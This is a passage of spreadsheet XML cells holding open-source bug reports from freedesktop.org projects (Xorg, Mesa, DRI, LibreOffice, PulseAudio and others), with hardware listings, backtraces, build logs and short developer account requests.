Root Port 4 (rev 06) (prog-if 00 [Normal decode])
    Flags: bus master fast devsel latency 0
    Bus: primary=00 secondary=43 subordinate=43 sec-latency=0
    Memory behind bridge: d0500000-d05fffff
    Capabilities: [40] Express Root Port (Slot+) MSI 00
    Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit-
    Capabilities: [90] Subsystem: Hewlett-Packard Company Device 7008
    Capabilities: [a0] Power Management version 2
    Kernel driver in use: pcieport
    Kernel modules: shpchp
00:1d.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2
Enhanced Host Controller (rev 06) (prog-if 20 [EHCI])
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 0 IRQ 20
    Memory at d4728000 (32-bit non-prefetchable) [size=1K]
    Capabilities: [50] Power Management version 2
    Capabilities: [58] Debug port: BAR=1 offset=00a0
    Capabilities: [98] PCI Advanced Features
    Kernel driver in use: ehci_hcd
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev a6) (prog-if
01 [Subtractive decode])
    Flags: bus master fast devsel latency 0
    Bus: primary=00 secondary=44 subordinate=48 sec-latency=32
    I/O behind bridge: 00002000-00002fff
    Memory behind bridge: d0400000-d04fffff
    Prefetchable memory behind bridge: 00000000d8000000-00000000dbffffff
    Capabilities: [50] Subsystem: Hewlett-Packard Company Device 7008
00:1f.0 ISA bridge: Intel Corporation Mobile 5 Series Chipset LPC Interface
Controller (rev 06)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 0
    Capabilities: [e0] Vendor Specific Information: Len=10 
    Kernel modules: iTCO_wdt
00:1f.2 SATA controller: Intel Corporation 5 Series/3400 Series Chipset 6 port
SATA AHCI Controller (rev 06) (prog-if 01 [AHCI 1.0])
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master 66MHz medium devsel latency 0 IRQ 46
    I/O ports at 5048 [size=8]
    I/O ports at 5064 [size=4]
    I/O ports at 5040 [size=8]
    I/O ports at 5060 [size=4]
    I/O ports at 5000 [size=32]
    Memory at d4727000 (32-bit non-prefetchable) [size=2K]
    Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit-
    Capabilities: [70] Power Management version 3
    Capabilities: [a8] SATA HBA v1.0
    Capabilities: [b0] PCI Advanced Features
    Kernel driver in use: ahci
00:1f.6 Signal processing controller: Intel Corporation 5 Series/3400 Series
Chipset Thermal Subsystem (rev 06)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master fast devsel latency 0 IRQ 10
    Memory at d4726000 (64-bit non-prefetchable) [size=4K]
    Capabilities: [50] Power Management version 3
    Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit-
43:00.0 Network controller: Intel Corporation Centrino Advanced-N 6200 (rev 35)
    Subsystem: Intel Corporation Centrino Advanced-N 6200 2x2 AGN
    Flags: bus master fast devsel latency 0 IRQ 49
    Memory at d0500000 (64-bit non-prefetchable) [size=8K]
    Capabilities: [c8] Power Management version 3
    Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+
    Capabilities: [e0] Express Endpoint MSI 00
    Capabilities: [100] Advanced Error Reporting
    Capabilities: [140] Device Serial Number 00-23-14-ff-ff-77-aa-48
    Kernel driver in use: iwlagn
    Kernel modules: iwlagn
44:06.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 06)
(prog-if 10 [OHCI])
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 64 IRQ 20
    Memory at d0401000 (32-bit non-prefetchable) [size=2K]
    Capabilities: [dc] Power Management version 2
    Kernel driver in use: firewire_ohci
    Kernel modules: firewire-ohci
44:06.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host
Adapter (rev 25)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 64 IRQ 22
    Memory at d0403000 (32-bit non-prefetchable) [size=256]
    Capabilities: [80] Power Management version 2
    Kernel driver in use: sdhci-pci
    Kernel modules: sdhci-pci
44:06.2 System peripheral: Ricoh Co Ltd R5C843 MMC Host Controller (rev 14)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 0 IRQ 11
    Memory at d0402000 (32-bit non-prefetchable) [size=256]
    Capabilities: [80] Power Management version 2
44:06.3 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev bb)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 168 IRQ 22
    Memory at d0400000 (32-bit non-prefetchable) [size=4K]
    Bus: primary=44 secondary=45 subordinate=48 sec-latency=176
    Memory window 0: d8000000-dbfff000 (prefetchable)
    Memory window 1: dc000000-dffff000
    I/O window 0: 00002000-000020ff
    I/O window 1: 00002400-000024ff
    16-bit legacy interface ports at 0001
    Kernel driver in use: yenta_cardbus
    Kernel modules: yenta_socket
ff:00.0 Host bridge: Intel Corporation Core Processor QuickPath Architecture
Generic Non-core Registers (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
ff:00.1 Host bridge: Intel Corporation Core Processor QuickPath Architecture
System Address Decoder (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
ff:02.0 Host bridge: Intel Corporation Core Processor QPI Link 0 (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
ff:02.1 Host bridge: Intel Corporation Core Processor QPI Physical 0 (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
ff:02.2 Host bridge: Intel Corporation Core Processor Reserved (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
ff:02.3 Host bridge: Intel Corporation Core Processor Reserved (rev 02)
    Subsystem: Intel Corporation Device 8086
    Flags: bus master fast devsel latency 0
How to reproduce:
Boot without X (runlevel 3) and with drm.debug=0xff
Login as root on the console.
Captured the register dump with: intel_reg_dumper &gt; regs.1
Set-up netconsole (quite a bit of mucking here with firewire to trigger kernel messages)
Captured dmesg with dmesg &gt; dmesg.2.log
I plug an external monitor on the VGA port.
A bunch of messages fly on the netconsole (netconsole.out).
The computer locks up shortly after.  No oops captured.</t>
  </si>
  <si>
    <t>XORG-14192</t>
  </si>
  <si>
    <t>nouveau on NV17: screen remains black with randr12 on</t>
  </si>
  <si>
    <t>nouveau on NV17: screen remains black with randr12 on
Nouveau works quite fine without randr12. When I activate the Randr12 option the screen remains black.
I have difficulties to stop the server or even reboot. I type Ctrl+Alt+Backspace and Ctrl+Alt+Del several times. The screen comes back to the virtual console but is like being slowly flooded of white fluid (picture to come).
I finally manage to see the graphical shutdown screen (usplash on Ubuntu) but the screen dispa corrupted GDM Ubuntu theme (another picture to come). And the computer finally reboots.
I attach the X logs with and without Randr12 xorg.conf and captures of the screen corruptions.
The version is the Ubuntu package by raof updated daily. It is dated Sun Jan 20 18:38:11 2008 +0000. Libdrm2 is also updated daily from a snapshot.
I now have deinstalled the graphical boot but no change.</t>
  </si>
  <si>
    <t>debian</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-52283</t>
  </si>
  <si>
    <t>Created attachment 64411
ssh public key file
name: Dylan Baker
email: baker.dylan.c@gmail.com
preferred account name: dcb</t>
  </si>
  <si>
    <t>LIBREOFFICE-40032</t>
  </si>
  <si>
    <t>Microsoft Works Import .wps</t>
  </si>
  <si>
    <t>Created attachment 50153
Example of .wps showing bug
Some MS Works .wps documents load as blank documents. The sample file is from www.writersedgeservice.com/filebrowser/proposalsfiction.asp
cad7593009.wps (in attachment) - opens blank if I look at the properties pane it 
claims it has 1 page with 0 characters.
fot4813409.wps and mot6312910.wps open correctly as plain text but with no formatting. They look totally different from how they do in Wordview.
Tested here on Windows XP SP3 but it is confirmed on Linux and Mac builds.</t>
  </si>
  <si>
    <t>LIBREOFFICE-80501</t>
  </si>
  <si>
    <t>Row Coloumn Indexes WRONG after: Select  Move - Undo by CRTL - Z</t>
  </si>
  <si>
    <t>Created attachment 101699
file to confirm big
The BUG occurs in Version 
LO 4.2.5.2
LO 4.3.0.1
THE BUG DOES NOT occur in OPEN OFFICE 3.4.1 (if for interest)
A simple spreadsheet is attached.
BEVOR repeat the doin read Steps to do. ( Simple orders some Screenshots )
--sorry for my english--
regards 
jk</t>
  </si>
  <si>
    <t>jkluth</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-11347</t>
  </si>
  <si>
    <t>My name is Brice Goglin . I'd like to get an account to fix documentation or minor build problems. I have been taking care of the X-related bugs in Debian. I forwarded quite a lot of Debian bugs on this bugzilla. I'd like to fix the minor ones myself (and stop forwarding more trivial ones in the future).
Preferred account name: bgoglin
Quick list of things that I could possibly commit:
* drivers that do not use PACKAGE_VERSION_MAJOR/MINOR/PATCHLEVEL as already reported for keyboard and penmount
* #9828: manpage of XGetCommand is wrong about return values
* #9946: XDrawArc man page maths come out bad on tty
* #9947: XmbLookupString man page warning
* #9948: error in manual page for XrmCombineDatabase
* #10237: twm: uses only getenv(HOME) not getpwent()
* #10274: X(7) manpage doesn't document %D for environment variables
* #11119: Xephyr: no manpage
* Debian #386001: ati manpage should mention radeon manpage
And possibly less trivial ones:
* #10742: xf86-video-glint crash during load because of endian problem
* #11339: mga 550 locks up when displaying 320x240 mode frequency too low
Thanks.</t>
  </si>
  <si>
    <t>PULSEAUDIO-75006</t>
  </si>
  <si>
    <t>neither XDG_CONFIG_HOME or PULSE_COOKIE is respected</t>
  </si>
  <si>
    <t>I want to move ~/.config/pulse/cookie to ~/.xdg/config/pulse/cookie.  I tried setting the environment variable PULSE_COOKIE but the original file keeps getting created.  I looked through the source code and saw this line.
$ grep \.config src/pulsecore/native-common.h
#define PA_NATIVE_COOKIE_FILE .config/pulse/cookie
Is this a hard coded variable?  I would expect that setting the PULSE_COOKIE variable would allow me to prevent the first file from getting created.  I do not have all of pulseaudio installed just libpulse as a dependency of other packages.
$ pacman -Q libpulse
libpulse 4.0-6</t>
  </si>
  <si>
    <t>carlwgeorge+freedesktop</t>
  </si>
  <si>
    <t>MESA-39251</t>
  </si>
  <si>
    <t>Second Life viewers from release 2.7.4.235167 to the last  3.4.0.264911 crash on start.</t>
  </si>
  <si>
    <t>The crash comes with this declaration:
ir_dereference_variable @ 0x1409dbb8 specifies undeclared variable `texcoord' @ 0x141e7258.
OS: Fedora release 15 (Lovelock) Kernel: 2.6.38.8-35.fc15.i686 (i686) Desktop: KDE 4.6.3 Display Server: X Server 1.10.3 Display Driver: radeon 6.14.99 OpenGL: 2.1 Mesa 7.12-devel (git-d4be170) Gallium 0.4 Compiler: GCC 4.6.0 + llvm 2.8 File-System: ext4 Screen Resolution: 1280x800</t>
  </si>
  <si>
    <t>MESA-87389</t>
  </si>
  <si>
    <t>[ILK] HL2 &amp; CS:Source water shader broken</t>
  </si>
  <si>
    <t>SIMD16 water fragment shader produces garbage for some pixels on Ironlake.
Bisected to:
commit 2ec161b2396b08341264965a5825152784b54549
Refs: 10.2-branchpoint-3378-g2ec161b
Author:     Jason Ekstrand 
AuthorDate: Mon Oct 6 21:27:06 2014 -0700
Commit:     Jason Ekstrand 
CommitDate: Fri Oct 24 16:24:05 2014 -0700
    i965/fs: Don't interfere with too many base registers
    On older GENs in SIMD16 mode we were accidentally building too much
    interference into our register classes.  Since everything is divided by 2
    the reigster allocator thinks we have 64 base registers instead of 128.
    The actual GRF mapping still needs to be doubled but as far as the ra_set
    is concerned we only have 64.  We were accidentally adding way too much
    interference.
This commit isn't actually broken -- but before this we failed to compile this shader as SIMD16.
The SIMD8 version of the shader works correctly (we get correct rendering with INTEL_DEBUG=no16)</t>
  </si>
  <si>
    <t>chrisf</t>
  </si>
  <si>
    <t>DRI-96448</t>
  </si>
  <si>
    <t>[BDW]igt@kms_pipe_crc_basic@suspend-read-crc-pipe-? cause dmesg warn</t>
  </si>
  <si>
    <t>Meet this in ABAT:
https://patchwork.freedesktop.org/series/7208/
Platform: ro-bdw-i7-5557U
Error message:
/opt/igt/tests/kms_pipe_crc_basic --run-subtest suspend-read-crc-pipe-A  
dmesg [  389.107576] Suspending console(s) (use no_console_suspend to debug)
[  389.108905] sd 0:0:0:0: [sda] Synchronizing SCSI cache
[  389.111748] sd 0:0:0:0: [sda] Stopping disk
[  389.263721] Broke affinity for irq 23
[  389.263724] Broke affinity for irq 42
[  389.263726] Broke affinity for irq 43
[  389.273575]  cache: parent cpu1 should not be sleeping
[  389.280149]  cache: parent cpu2 should not be sleeping
[  389.285083]  cache: parent cpu3 should not be sleeping
[  389.329483] sd 0:0:0:0: [sda] Starting disk
[  389.845328] [drm:intel_dp_link_training_clock_recovery [i915]] *ERROR* failed to enable link training
[  389.928992] [drm:intel_dp_start_link_train [i915]] *ERROR* failed to start channel equalization
 /opt/igt/tests/kms_pipe_crc_basic --run-subtest suspend-read-crc-pipe-B  
dmesg [  404.434876] Suspending console(s) (use no_console_suspend to debug)
[  404.436248] sd 0:0:0:0: [sda] Synchronizing SCSI cache
[  404.440614] sd 0:0:0:0: [sda] Stopping disk
[  404.596305] Broke affinity for irq 42
[  404.605813]  cache: parent cpu1 should not be sleeping
[  404.612288]  cache: parent cpu2 should not be sleeping
[  404.617202]  cache: parent cpu3 should not be sleeping
[  404.670701] sd 0:0:0:0: [sda] Starting disk
[  405.174083] [drm:intel_dp_link_training_clock_recovery [i915]] *ERROR* failed to enable link training
[  405.257779] [drm:intel_dp_start_link_train [i915]] *ERROR* failed to start channel equalization</t>
  </si>
  <si>
    <t>coredump</t>
  </si>
  <si>
    <t>DRI-91357</t>
  </si>
  <si>
    <t>[BSW] igt/gem_render_copy result is crash</t>
  </si>
  <si>
    <t>Created attachment 117162
kern.log part1
Braswell-M
Hardware
Platform: Braswell M
CPU : Intel(R) CPU  @ 1.52 GHz (family: 6 model: 76 stepping: 3)
SoC : BSW C0
CRB : BRASWELL RVP Fab2 Mandatory
Reworks : All Feature Reworks: F28 F32F33 &amp; F37 Optional reworks : O-01a Software
BIOS : BRAS.X64.B074.R00.1505311952
TXE FW : 2.0.0.2064 Ksc : 1.08
Linux distribution: Ubuntu 14.04 LTS 64 bits
kernel 4.2.0-rc2-drm-intel-nightly-ww29++
cairo: (HEAD tag: 1.14.2) 93422b3cb5e0ef8104b8194c8873124ce2f5ea2d from git://git.freedesktop.org/git/cairo
drm: (HEAD tag: libdrm-2.4.62 tag: 2.4.62) ba4b5ac010ab85406ec52e3906e13d58cd9aa782 from git://anongit.freedesktop.org/mesa/drm
intel-driver: (HEAD tag: 1.6.0 origin/v1.6-branch) 32268c46d538667d437dc9266aa4c183e51c1286 from git://git.freedesktop.org/git/vaapi/intel-driver
libva: (HEAD tag: libva-1.6.0 origin/v1.6-branch) a8008998bc0d4a76ae6927607c048e52ba50fd0e from git://git.freedesktop.org/git/vaapi/libva
mesa: (HEAD tag: mesa-10.6.2) 9643cce94c8a1938e3342fb83d025a1e5c2aa79b from git://anongit.freedesktop.org/mesa/mesa
xf86-video-intel: (HEAD tag: 2.99.917) baec802b21387d04aebb10ac29e719a1800c5aa0 from git://anongit.freedesktop.org/xorg/driver/xf86-video-intel
xserver: (HEAD tag: xorg-server-1.17.2 origin/server-1.17-branch) 2123f7682d522619f101b05fb75efa75dabbe371 from git://git.freedesktop.org/git/xorg/xserver
intel-gpu-tools: (HEAD origin/master origin/HEAD master) 7f952bd976416196f628c42a8d7bf77fe3c1540f from git://git.freedesktop.org/git/xorg/app/intel-gpu-tools
Pre-conditions:
---------------
2 monitors connected to HDMI and DP ports
Steps:
-------
1. Execute command:
cd /intel-gpu-tools/scripts
./run-tests.sh -s -r /results -x .*suspend.* -x gem_userptr_blits@swapping.* -x gem_dummy_reloc_loop -x gem_concurrent_all.* -x gem_evict_everything@swapping-hang -x gem_close_race -x gem_cpu_reloc -x gem_ctx_thrash.* -x drv_hangman.* -x drv_missed_irq_hang -x kms_setmode.* -x gem_fence_thrash@bo-write-verify-threaded-y -x gem_multi_bsd_sync_loop -x gem_reloc_vs_gpu@forked-interruptible-faulting-reloc-thrashing -x gem_seqno_wrap -x gem_userptr_blits@forked-sync-swapping-multifd-mempressure-interruptible -x kms_render@gpu-blit -x kms_cursor_crc@cursor-size-change -x gem_render_linear_blits@swap-thrash -x gem_render_tiled_blits@swap-thrash -x gem_evict_everything@mlocked-hang -x gem_userptr_blits@mlocked-normal-sync -x gem_userptr_blits@mlocked-sync-interruptible -x gem_userptr_blits@mlocked-unsync-normal -x gem_userptr_blits@mlocked-unsync-interruptible -x gem_exec_big -x gem_mmap_gtt@medium-copy -x gem_mmap_gtt@medium-copy-xy -x gem_pwrite@huge-gtt -x gem_pwrite@big-cpu -x gem_pwrite@big-gtt -x gem_pwrite@huge-cpu
2. Wait a moment
Actual result:
---------------
2. Result of igt@gem_render_copy is crash.
Expected result:
-----------------
2. Result is Pass.</t>
  </si>
  <si>
    <t>XORG-14298</t>
  </si>
  <si>
    <t>Driver/s3virge</t>
  </si>
  <si>
    <t>S3Virge / bug in resolution detection</t>
  </si>
  <si>
    <t>Created attachment 14024
Xorg.0.log
xf86-video-s3virge(git version) not working. Look at Xorg.0.log please.</t>
  </si>
  <si>
    <t>LIBREOFFICE-42563</t>
  </si>
  <si>
    <t>Lost  print option range pages in catalan localization</t>
  </si>
  <si>
    <t>When we work with 3.4.2 version and libreoffice-l10n-ca the print options: Pages Selection and Print reverse page order are missing</t>
  </si>
  <si>
    <t>jodenacatala</t>
  </si>
  <si>
    <t>MESA-29848</t>
  </si>
  <si>
    <t>Created attachment 38231
point-sprite.png
mesa: 120d5a95cb983b0b983089ba415486c55a9196e3 (master)
piglit point-sprite now fails but previously passed.
$ ./bin/point-sprite
Maximum point size is 255.000000 using 64.000000
Probe at (17114)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 64.000 origin = lower left
Probe at (90106)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 32.000 origin = lower left
Probe at (159102)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 16.000 origin = lower left
Probe at (226100)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 8.000 origin = lower left
Probe at (29299)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 4.000 origin = lower left
Probe at (35798)
  Expected: 1.000000 1.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
  size = 2.000 origin = lower left</t>
  </si>
  <si>
    <t>MESA-108879</t>
  </si>
  <si>
    <t>[CIK] [regression] All opencl apps hangs indefinitely in si_create_context</t>
  </si>
  <si>
    <t>Bisected to 9b331e462e5021d994859756d46cd2519d9c9c6e.
Tracing calls done by clinfo and pressing Ctrl+C gives:
#0  0x00007ffff7e9cead in syscall () from /lib64/libc.so.6
#1  0x00007ffff143422c in sys_futex (val3=-1 addr2=0x0 timeout=0x0 val1=2 op=9 addr1=0x555555899b08) at ../../src/util/futex.h:50                                                
#2  futex_wait (timeout=0x0 value=2 addr=0x555555899b08) at ../../src/util/futex.h:50
#3  do_futex_fence_wait (fence=fence@entry=0x555555899b08 timeout=timeout@entry=false abs_timeout=abs_timeout@entry=0) at u_queue.c:115                                             
#4  0x00007ffff1434739 in _util_queue_fence_wait (fence=fence@entry=0x555555899b08) at u_queue.c:130                                                                                  
#5  0x00007ffff146cd79 in util_queue_fence_wait (fence=0x555555899b08) at ../../../../src/util/u_queue.h:161                                                                          
#6  si_bind_compute_state (ctx=0x5555558648c0 state=0x555555899af0) at si_compute.c:277
#7  0x00007ffff146eb79 in si_compute_do_clear_or_copy (sctx=sctx@entry=0x5555558648c0 dst=dst@entry=0x5555558a3910 dst_offset=dst_offset@entry=0 src=src@entry=0x0                
    src_offset=src_offset@entry=0 size=size@entry=16 clear_value=0x7fffffffcea0 clear_value_size=4 coher=SI_COHERENCY_SHADER) at si_compute_blit.c:131                            
#8  0x00007ffff146ecb0 in si_clear_buffer (sctx=sctx@entry=0x5555558648c0 dst=0x5555558a3910 offset=offset@entry=0 size=16 clear_value=clear_value@entry=0x7fffffffcea0          
    clear_value_size=clear_value_size@entry=4 coher=SI_COHERENCY_SHADER) at si_compute_blit.c:217                                                                                    
#9  0x00007ffff147de40 in si_create_context (screen=screen@entry=0x5555555e07c0 flags=flags@entry=0) at si_pipe.c:624                                                                
#10 0x00007ffff147e8d1 in radeonsi_screen_create (ws= config=) at si_pipe.c:1123                                                                       
#11 0x00007ffff143edfa in radeon_drm_winsys_create (fd=fd@entry=4 config=config@entry=0x7fffffffd038 screen_create=screen_create@entry=0x7ffff147e1c0 )     
    at radeon_drm_winsys.c:941
#12 0x00007ffff131b49d in create_screen (fd=4 config=0x7fffffffd038) at pipe_radeonsi.c:18                                                                                           
#13 0x00007ffff7cc606b in pipe_loader_create_screen (dev=0x5555555ccc80) at pipe_loader.c:137                                                                                         
#14 0x00007ffff7ce744c in clover::device::device (this=0x5555555b9f50 platform=... ldev=) at core/device.cpp:47                                                      
#15 0x00007ffff7cf1584 in clover::create () at ./util/pointer.hpp:229                                                        
#16 clover::platform::platform (this=0x7ffff7d9edc0 ) at core/platform.cpp:36                                                                
#17 0x00007ffff7cc5a26 in __static_initialization_and_destruction_0 (__initialize_p=1 __priority=65535) at api/platform.cpp:141                                                      
#18 _GLOBAL__sub_I_platform.cpp(void) () at api/platform.cpp:141
#19 0x00007ffff7fe1dea in call_init.part () from /lib64/ld-linux-x86-64.so.2
#20 0x00007ffff7fe1eea in _dl_init () from /lib64/ld-linux-x86-64.so.2
#21 0x00007ffff7fe5edf in dl_open_worker () from /lib64/ld-linux-x86-64.so.2
#22 0x00007ffff7edf0d7 in _dl_catch_exception () from /lib64/libc.so.6
#23 0x00007ffff7fe574e in _dl_open () from /lib64/ld-linux-x86-64.so.2
#24 0x00007ffff7f6c39a in dlopen_doit () from /lib64/libdl.so.2
#25 0x00007ffff7edf0d7 in _dl_catch_exception () from /lib64/libc.so.6
#26 0x00007ffff7edf173 in _dl_catch_error () from /lib64/libc.so.6
#27 0x00007ffff7f6caf9 in _dlerror_run () from /lib64/libdl.so.2
#28 0x00007ffff7f6c43a in dlopen@@GLIBC_2.2.5 () from /lib64/libdl.so.2
#29 0x00007ffff7f76d11 in _initClIcd_real () from /lib64/libOpenCL.so.1
#30 0x00007ffff7f7935c in clGetPlatformIDs () from /lib64/libOpenCL.so.1
#31 0x000055555555a4ba in main ()
Removing the CIK-specific function call under /* Clear the NULL constant buffer because loads should return zeros. */ makes clinfo work normally.</t>
  </si>
  <si>
    <t>LIBREOFFICE-65146</t>
  </si>
  <si>
    <t>[si-gui] Manager shows 5 similar entries</t>
  </si>
  <si>
    <t>Manager shows 5 similar entries pointing to C:\Program Files\LibreOffice\Master (must be the number of times I installed to that path)
It should not save repeated settings.</t>
  </si>
  <si>
    <t>DRI-31988</t>
  </si>
  <si>
    <t>Reverted: use VBT provided eDP params if available</t>
  </si>
  <si>
    <t>This commit broke QA's Dell e6510 and Dave Airlie's HP 2540 but it is required for the Sony Vaio Z. ARGH.</t>
  </si>
  <si>
    <t>MESA-30638</t>
  </si>
  <si>
    <t>Flash doesn't work in fullscreen with r300 using Mesa 7.9</t>
  </si>
  <si>
    <t>I upgraded to libdrm 2.4.22 Mesa 7.9 (--enable-xcb --enable-glx-tls --enable-gallium-svga --enable-gallium-radeon --enable-gallium-swrast --with-dri-drivers=r300r600swrast) xorg-server 1.9.0.901 and xf86-video-ati-6.13.2.
For some reason the same configuration works with Mesa 7.8.2 but with 7.9 I'm unable to get Flash videos working in fullscreen. The image is corrupted and I can't view anything.
I don't know if the results from glxgears show something but I get about 300 with swrast which works fine.
Running synchronized to the vertical refresh.  The framerate should be
approximately the same as the monitor refresh rate.
378 frames in 5.0 seconds = 75.483 FPS
I'm using kernel 2.6.35.5 with KMS.
The logs don't show any errors.</t>
  </si>
  <si>
    <t>others1</t>
  </si>
  <si>
    <t>CAIRO-15628</t>
  </si>
  <si>
    <t>cairo-1.6.4 testsuite crashes Xserver</t>
  </si>
  <si>
    <t>When running the cairo-1.6.4 testsuite (make check) I reproducibly get a crash of the Xserver (Xorg-6.9 linux-2.6.20 on i686).
With the radeon driver (RV370 5B60 [Radeon X300 (PCIE)]) X was using 100% CPU time and could be killed but the graphic state was messed up such that a reboot was required.
With the mag driver from Matrox (MGA G550 AGP) X kills itself via xf86SigHandler
and gets automatically restarted from xdm.
All that seems to happen during TESTING extend-reflect and the last output I see is in the make.log is:
extend-reflect-xlib-fallback-rgb24 [0] (similar):</t>
  </si>
  <si>
    <t>MESA-93628</t>
  </si>
  <si>
    <t>Exception: attempt to use unavailable module DRM when building MesaGL 11.1.0 on windows</t>
  </si>
  <si>
    <t>downloaded MesaGL 11.1.0
simply running scons even scons -h will result in:
C:\source\mesa-11.1.0&gt;scons
scons: Reading SConscript files ...
Checking for MSVC ...  yes
Checking for win_flex ...  yes
Checking for win_bison ...  yes
Checking for X11 (x11 xext xdamage xfixes glproto &gt;= 1.4.13)... no
Checking for XCB (x11-xcb xcb-glx &gt;= 1.8.1 xcb-dri2 &gt;= 1.8)... no
Checking for XF86VIDMODE (xxf86vm)... no
Checking for DRM (libdrm &gt;= 2.4.38)... no
Checking for UDEV (libudev &gt;= 151)... no
Exception: Attempt to use unavailable module DRM:
  File C:\source\mesa-11.1.0\SConstruct line 138:
    duplicate = 0 # http://www.scons.org/doc/0.97/HTML/scons-user/x2261.html
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 614:
    return method(*args **kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 551:
    return _SConscript(self.fs *files **subst_kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 260:
    exec _file_ in call_stack[-1].globals
  File C:\source\mesa-11.1.0\src\SConscript line 40:
    SConscript('gallium/SConscript')
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 614:
    return method(*args **kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 551:
    return _SConscript(self.fs *files **subst_kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 260:
    exec _file_ in call_stack[-1].globals
  File C:\source\mesa-11.1.0\src\gallium\SConscript line 8:
    SConscript('auxiliary/pipe-loader/SConscript')
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 614:
    return method(*args **kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 551:
    return _SConscript(self.fs *files **subst_kw)
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Script\SConscript.py line 260:
    exec _file_ in call_stack[-1].globals
  File C:\source\mesa-11.1.0\src\gallium\auxiliary\pipe-loader\SConscript line 23:
    env.PkgUseModules('DRM')
  File C:\Python27_32\Scripts\..\Lib\site-packages\scons-2.4.0\SCons\Environment.py line 224:
    return self.method(*nargs **kwargs)
  File C:\source\mesa-11.1.0\scons\custom.py line 218:
    raise Exception('Attempt to use unavailable module %s' % name)
This was working fine for me in for instance 11.0.4. I believe DRM is not available for windows so this exceptions seems to make it impossible to build 11.1 under windows.</t>
  </si>
  <si>
    <t>maurits.fassaert</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-12856</t>
  </si>
  <si>
    <t>international keys (deadkey) don't work with turkish Q layout</t>
  </si>
  <si>
    <t>With a turckish Q keyboard you can type a lot of international symbols using dead_circumflex dead_diaeresis dead_tilde dead_acute dead_grave ... but not with xkb. I 've made a variant tr_int to enable this feature. 
Where to propose the patch?</t>
  </si>
  <si>
    <t>pellice</t>
  </si>
  <si>
    <t>NICE-89839</t>
  </si>
  <si>
    <t>Add set_local_credentials API</t>
  </si>
  <si>
    <t>Needed for WebRTC compliance.
http://lists.freedesktop.org/archives/nice/2015-February/001075.html
https://github.com/shadeslayer/libnice/commit/4bc345bce8b7886bd8992ab11501c124ddf6de04
https://github.com/shadeslayer/libnice/commit/6688f6c9830addd0438c52cad7c1718884dffacd</t>
  </si>
  <si>
    <t>rohan</t>
  </si>
  <si>
    <t>LIBREOFFICE-39277</t>
  </si>
  <si>
    <t>Link for release notes 3.4.2 RC1 doesn't exists</t>
  </si>
  <si>
    <t>If you go to the pre-releases tab and click on 'release notes' you are redirected to http://wiki.documentfoundation.org/Releases/3.4.1/RC3</t>
  </si>
  <si>
    <t>a6569208</t>
  </si>
  <si>
    <t>XORG-6216</t>
  </si>
  <si>
    <t>configure.ac should REQUIRED_MODULES += inputproto</t>
  </si>
  <si>
    <t>because dix/events.c wants XIproto.h (near line 120)</t>
  </si>
  <si>
    <t>hs4233</t>
  </si>
  <si>
    <t>DRI-98516</t>
  </si>
  <si>
    <t>[i915][SNB] black screen in X when resuming from suspend or hibernate</t>
  </si>
  <si>
    <t>Created attachment 127639
dmesg output after issue occurred
# System Information
Linux  4.8.5-gentoo #1 SMP  2016 x86_64 Intel(R) Core(TM) i7-2620M CPU @ 2.70GHz GenuineIntel GNU/Linux
Manufacturer: LENOVO
Product Name: 4290W4H
Version: ThinkPad X220
Internal connector: LVDS
Connection to external displays: often DP (via docking station) sometimes VGA (directly)
# Problem description
